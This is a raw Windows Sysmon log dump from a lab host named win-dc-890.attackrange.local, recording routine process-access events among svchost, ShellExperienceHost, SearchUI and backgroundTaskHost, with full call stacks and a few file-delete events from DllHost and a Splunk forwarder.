07:51:44.201{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048508Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.201{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048507Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.201{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048506Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.201{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048505Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.201{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048504Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.201{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048503Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.201{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048502Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.201{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048501Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.201{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048500Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.154{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048499Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.154{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048498Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.154{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048497Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.154{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048496Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.154{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048495Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.154{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048494Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.154{466BC892-02BC-60E8-2C00-00000000CF01}30644868C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001048493Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.154{466BC892-02BC-60E8-2C00-00000000CF01}30644868C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 23542300x80000000000000001048492Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.017{466BC892-32DC-60E8-900B-00000000CF01}8936ATTACKRANGE\bobC:\Windows\system32\DllHost.exeC:\Users\bob\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edb00004.logMD5=59978F80F9AF5478C84BE95B8BD5B394,SHA256=50818F161B242F1C756B0A400C31BB2BCB984318BF7E3C661C78C8B9594D01BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048491Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.001{466BC892-32DC-60E8-900B-00000000CF01}8936ATTACKRANGE\bobC:\Windows\system32\DllHost.exeC:\Users\bob\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edb00003.logMD5=AA300DD4047DD88BB35D811438DDEF86,SHA256=2D6A2477C6D930A42B1CEB4B5C26A085EBF2EF90A6B2DD3BC17884B274022C3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048562Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.848{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34FB985FB21CC9B453BC99F106EA5438,SHA256=95690726A0ADA7FC1C4542EB7BD082E76B94BC7EBB2A6AEF30FCA8AEFD07DA26,IMPHASH=00000000000000000000000000000000falsetrue 